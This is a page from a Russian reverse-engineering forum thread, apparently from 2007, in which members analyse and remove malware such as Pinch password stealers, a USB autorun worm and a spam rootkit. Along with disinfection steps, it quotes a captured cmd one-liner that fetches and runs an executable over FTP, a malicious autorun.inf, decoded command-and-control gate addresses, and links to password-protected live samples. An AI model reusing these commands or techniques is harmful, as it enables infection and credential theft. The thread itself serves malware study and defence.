Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых)

 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
Посл.ответ Сообщение

Ранг: -0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 октября 2006 23:15 · Поправил: Модератор
· Личное сообщение · #1

В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 29 ноября 2007 15:03
· Личное сообщение · #2

Kycok Caxapa
Инструкция по лечению твоего Г:

1. Restart in Safe mode (Hit F8 when Windows starts)
2. Delete the following file:
c:\windows\System32\ole16.dll
3. Open Start -> Run -> regedit.exe (and hit enter)
4. Go to:
[HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-
000000000046}\InProcServer32]
5. Replace: (default)=”ole16.dll” with (default)=”shell32.dll”
and
ThreadingModel=”Both” with ThreadingModel=”Apartment”
6. Go to:
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-
0000-0000-C000-000000000046}\InProcServer32]
7. Replace: (default)=”ole16.dll” with (default)=”shell32.dll”
and
ThreadingModel=”Both” with ThreadingModel=”Apartment”
8. Delete all files from all the Temp directories.
9. Run AntiSpyRemoval_Spyware.FidCop.A_EN.exe


1a14_29.11.2007_CRACKLAB.rU.tgz - AntiFidCop.zip

-----
Computer Security Laboratory




Ранг: 41.2 (посетитель)
Активность: 0.030
Статус: Участник

Создано: 29 ноября 2007 15:05
· Личное сообщение · #3

Ara Думаете если чел спрашивает как смотреть отчет троя(пинч) т.е даже поиск не рулит то че спрашивается не выкладывать отчеты. все равно не смогут. обо не умеют.
[HEX] давай в приват отчеты. либо пусть модеры там по рангу дают просмотр таких тем. там 200 ранг. либо отдельный подфорум. к взлому и реверсингу то относится значит не противоречит тематике форума. Либо к АДМИНУ!!!




Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 29 ноября 2007 15:53
· Личное сообщение · #4

Не понимаю смысла подфорума, где один будет реверсить и выкладывать для юзверей чужие пассы. Мне лично это не нравится, а вы сами думайте, выносите предложение, топик для предложений есть.




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 29 ноября 2007 16:40
· Личное сообщение · #5

Ara
Согласен. Не совсем этично получается. У кого то может горе с утерей особо личной инфы, а мы тут её раскидываем по всему инету.
У кого мозг есть, тот и сам сумеет по выложеной инфе разобраться что к чему.

-----
Computer Security Laboratory





Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 29 ноября 2007 17:50
· Личное сообщение · #6

+1 нефиг.
я уже говорил об этом: воруя пароли с отчётов мы уподабливаемся тем же зловредам.
довайте противодействовать им путём убиения ящиков с отчётами и саёнтов с гейтами.

-----
AutoIt




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 29 ноября 2007 19:20
· Личное сообщение · #7

-1 потому что я отреверсил этого тройана, а некто зашёл на ящик и УБИЛ все отчёты на серваке. Это называется вандаллизмом

-----
все багрепорты - в личные сообщения





Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 29 ноября 2007 19:52
· Личное сообщение · #8

Это называется нормальным пониманием вещей. Респект тому товарищу.




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 30 ноября 2007 10:33
· Личное сообщение · #9

HandMill
Кстати Пинч и реверсить не надо (и так известно что он делает). Достаточно на виртуалке запустил и трафик сетевой записать в котором все обращения к мылу или гейту как на ладони будут.

-----
Computer Security Laboratory





Ранг: 109.2 (ветеран)
Активность: 0.090
Статус: Участник
Cardinal

Создано: 30 ноября 2007 10:46
· Личное сообщение · #10

[HEX] пишет:
Кстати Пинч и реверсить не надо (и так известно что он делает). Достаточно на виртуалке запустил и трафик сетевой записать в котором все обращения к мылу или гейту как на ладони будут.

Глупо. Да и крипторы, на нем обычно висят, не из лучшых, так что отреверсить особого труда не составляет.

-----
– Почему ты работаешь по ночам ? – Так удобнее... В одну смену с чертями...





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 30 ноября 2007 10:55
· Личное сообщение · #11

tnt17
Смотря с какой стороны смотреть. Если в плане аутотренинга в реверсе, то согласен что глупо, а если нужен результат как можно быстро и без заморочек, то это вполне нормальный вариант.

Сначала и я реверсил пинчи накрытые всяким самопальным говном и щас уже нареверсился. Так что щас использую такую методу и пока метода не подводила.

-----
Computer Security Laboratory




Ранг: 54.2 (постоянный)
Активность: 0.040
Статус: Участник

Создано: 30 ноября 2007 19:23
· Личное сообщение · #12

заметил тут как то в процессах висит cmd.exe а в командной строке у него

cmd /k echo open c0re.myftp.biz 1981 > o&echo user 1 1 >> o &echo get update5865.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &update5865.exe




Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 03 декабря 2007 13:15
· Личное сообщение · #13

кому интересно гляньте червячка)
на флешку залез..
пароль : 1

744a_03.12.2007_CRACKLAB.rU.tgz - autorun.inf.rar

-----
AutoIt




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 03 декабря 2007 14:43 · Поправил: HandMill
· Личное сообщение · #14

OLEGator даже смотреть не буду. Просто уверен, что это VBS Igidak - он создаёт на твоей флешке не только autorun.inf, а ещё кучу всяких расширений присваивает имени autorun. Для самораспространения использует VB Script - autorun.vbs для автоматического запуска использует autorun.inf - когда открываешь директорию с червяком в Explorer'е, то срабатывает автозапуск (по принципу как на CD дисках). Автозапуска можно избежать изменив ключик в реестре, либо используя альтернативные проводники. Эти файлы имеют аттрибуты скрытый и системный. Что б увидить их в проводнике нужно нажать в меню Сервис - // - Свойства папки - // вкладка "Вид" и снимаешь галку с "Скрывать защищённые системные файлы" и выбираешь "Показывать скрытые файлы и папки". Эту опцию активирует этот червяк. Впервые я с ним столкнулся где-то пол-года назад. Очень распространённая зараза среди пользователей кто юзает антивирусы со старыми базами.

-----
все багрепорты - в личные сообщения





Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 03 декабря 2007 15:52 · Поправил: OLEGator
· Личное сообщение · #15

мой нод сказал: Win32/Sohanad.NAK чepвь
фишка в том, что для защиты от афторан вирусов на флешке я создал папку с именем autorun.inf
и уже autorun.inf файл создаваться не может.
А этя тварь сидела в нутри этой папки и имела значёк папки и имя папки, пакована UPX + рядом авторан инф файл с содержимым:
[Autorun]
Open=SSVICHOSST.exe
Shellexe cute=SSVICHOSST.exe
Shell\Open\command=SSVICHOSST.exe
Shell=Open

-----
AutoIt





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 03 декабря 2007 16:04
· Личное сообщение · #16

HandMill
Чуток промахнулся. С Игидаком сам сталкивался и там ничего сложного нету. Просто тело распространяет само себя и правит чуток реестр.

Этот же вирь индефицируется как Win32.HLLW.Texmer.38
Вот лог анализа
analysis.seclab.tuwien.ac.at/result.php?taskid=9c0546a68430726491da98cc20f0d7dc
Из него видно что каждое утро по расписанию стартует файлег SSVICHOSST.exe
И ко всему в добавок апдейтиться через инет.

-----
Computer Security Laboratory





Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 03 декабря 2007 16:19
· Личное сообщение · #17

класный анализ)
и подробно как.
хороший сайтенг буду знать

-----
AutoIt





Ранг: 95.2 (постоянный)
Активность: 0.040
Статус: Участник

Создано: 04 декабря 2007 07:41 · Поправил: SecurAdmin
· Личное сообщение · #18

Вот и я наконец решил присоединиться к такому интереснейшему занятию как дебаг говнопенчей =)
Вот нарыл один экземпляр только расшифровать имя хоста и мыла куда отчеты идут у меня не вышло....а криптор снялся на ура. Кстати пинч походу приватный, ибо больно много он всего угоняет....вплоть до акков к рапиде (если я правильно понял, ибо он обращается или ищет файлы rapidshare.txt) и не только это.

-----
бессмысленные манипуляции не становятся более разумными если их повторять





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 04 декабря 2007 12:12
· Личное сообщение · #19

SecurAdmin пишет:
а криптор снялся на ура

У мну чето не выходит upack снял, потом какой-то самопал походу
Вот тут: 00401082 CALL DWORD PTR DS:[40C05A] непонятно, по адресу 40C05A одни нули, короче кал в никуда.

-----
Nulla aetas ad discendum sera





Ранг: 95.2 (постоянный)
Активность: 0.040
Статус: Участник

Создано: 04 декабря 2007 12:22
· Личное сообщение · #20

Я его целиком не снимал, просто довел до того состояния, чтобы строки расшифровались =)

-----
бессмысленные манипуляции не становятся более разумными если их повторять




Ранг: 222.2 (наставник), 115thx
Активность: 0.140.01
Статус: Участник

Создано: 04 декабря 2007 12:38
· Личное сообщение · #21

SecurAdmin, вот что мне удалось вытянуть:

13176FFD 00 00 00 59 6B 52 46 64 56 6B 7A 62 47 6C 4E 4D ...YkRFdVkzbGlNM
1317700D 30 6F 32 54 47 30 35 65 56 70 33 50 54 30 3D 00 0o2TG05eVp3PT0=.
1317701D 50 4F 53 54 20 2F 7A 67 61 74 65 2E 70 68 70 20 POST /zgate.php

YkRFdVkzbGlNM0o2TG05eVp3PT0= - Явно Base64. Декодируем http://ostermiller.org/calc/encode.html два раза и получаем:
1.cyb3rz.org
гейт: /zgate.php

Мыло так и не расшифровал:

1317710D 0D 0A 0D 0A 61 3D 30 78 ....a=0x
1317711D 34 33 64 30 66 73 73 64 39 77 36 38 63 36 37 38 43d0fssd9w68c678
1317712D 61 73 36 64 73 61 38 64 61 40 6D 61 69 6C 2E 72 as6dsa8da@mail.r
1317713D 75 33 33 33 26 62 3D 50 69 6E 63 68 5F 72 65 70 u333&b=Pinch_rep
1317714D 6F 72 74 26 64 3D 25 73 26 63 3D 00 72 65 70 6F ort&d=%s&c=.repo
1317715D 72 74 2E 62 69 6E rt.bin

0x43d0fssd9w68c678as6dsa8da - что эт за крипт такой?

Только мне кажется, что сейчас "cyb3rz.org" вообще мёртвый ... или я ошибаюсь? Пароль на мыло в этой версии пинча кажется не юзается вообще.

-----
все багрепорты - в личные сообщения




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 04 декабря 2007 12:52
· Личное сообщение · #22

Довольно интересная статья:
www.viruslist.com/ru/analysis?pubid=204007578

-----
Crack your mind, save the planet





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 04 декабря 2007 12:58
· Личное сообщение · #23

HandMill пишет:
Пароль на мыло в этой версии пинча кажется не юзается вообще

Так это гейтовая версия, пароль там и не нужен

-----
Nulla aetas ad discendum sera




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 04 декабря 2007 13:25
· Личное сообщение · #24

Вот вам интересная зверюга.
Пароль: vir

17d8_04.12.2007_CRACKLAB.rU.tgz - wBHTGf.rar

-----
Crack your mind, save the planet





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 04 декабря 2007 14:53 · Поправил: [HEX]
· Личное сообщение · #25

Styx
руткит. надо поподробнее расмотреть его на VM.

тянет 3 файла в одном флаконе hxxp://208.66.195.71/40e8001430303030303030303030303030303030303031306 c0000002a6600000000


Инжектятся в IE и шлют спам (возможно еще что то есть).
По методе и содержимому очень сильно похоже на это
www.geocities.jp/kiskzo/main.sys.html

-----
Computer Security Laboratory




Ранг: 2.4 (гость)
Активность: 0=0
Статус: Участник

Создано: 04 декабря 2007 16:16
· Личное сообщение · #26

Как у вас тут любят писать - гавнопинч в архиве ). По криптованный криптером, который на данный момент весьма популярен. Есть антиэмуляция.
пасс - qwerty

4ccb_04.12.2007_CRACKLAB.rU.tgz - EC07494CC3336C5F8DFEF228EB562EC4.rar



Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 04 декабря 2007 16:28
· Личное сообщение · #27

[HEX]

Кстати в упаковке прожка с знакомой стрингой: 13141724=13141724 (ASCII "Poshel-ka ti na hui drug aver")
Local call from 1314A6A9

(:

-----
Crack your mind, save the planet




Ранг: 2.4 (гость)
Активность: 0=0
Статус: Участник

Создано: 04 декабря 2007 16:29
· Личное сообщение · #28

[HEX] пишет:
Styx
руткит. надо поподробнее расмотреть его на VM.

тянет 3 файла в одном флаконе hxxp://208.66.195.71/40e8001430303030303030303030303030303030303031306 c0000002a6600000000


Инжектятся в IE и шлют спам (возможно еще что то есть).
По методе и содержимому очень сильно похоже на это
www.geocities.jp/kiskzo/main.sys.html

Этот руткит уже всех заипал. Один из массовых спамеров. Универсальный спамбот. Это только лодер. Загружает в память ip6fw для обхода хипс-систем путем восстановления SSDT. runtime.sys - для маскировки IE, в который идет инжект. Загружается замусоренный дроппер (по этолй ссылке), расшифровка и запуск из теспа. Регистрирутестя и загружается runtime2.sys - спамер. Является фильтром - его никто из антивирей не удалит (почти ;)). Плюс полиморф криптер - чтобы лодеры не палились, антиэмуляция/антиэвристика плюс руткит - почти все антивири беспомощны перед этой хренью. Даже не много бореется против антируткитов - восстановка своих хуков.




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 04 декабря 2007 16:41
· Личное сообщение · #29

berv
Да я уже все посмотрел
Все точь в точь. Особо ничего интересного в нем нет =\ А жаль.

Styx
Ну видать одна группа на заказ пишет говно всякое. Или какой то конструктор по рукам пошел. Вот послание и пихается во всю заразу.

-----
Computer Security Laboratory





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 04 декабря 2007 17:33 · Поправил: Flint
· Личное сообщение · #30

berv пишет:
Как у вас тут любят писать - гавнопинч в архиве ). По криптованный криптером, который на данный момент весьма популярен. Есть антиэмуляция.
пасс - qwerty


Trojan.PWS.LDPinch.1941
гейт тут pinch.100webspace.net/uycgeouycgouycgoer/gate.php

еще не встречал такого криптора, мусора всякого в код напихал

-----
Nulla aetas ad discendum sera





Ранг: 756.3 (! !), 113thx
Активность: 0.610.05
Статус: Участник
Student

Создано: 04 декабря 2007 20:46
· Личное сообщение · #31

--> unEbookEdit v2.6 <-- http://www.etextwizard.com/download/uneep/uneepsetup.exe (976Kb)
при инсталле drweb ругается на троя unEbookEdit\is-AM5KE.tmp - Infiziert mit Trojan.PWS.Gamania.4223, при запуске прога ломится в инет типа обновляться и без "обновления" не запускается... Довольно странное поведение для распаковщика книг...
Там правда трой?

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh



<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати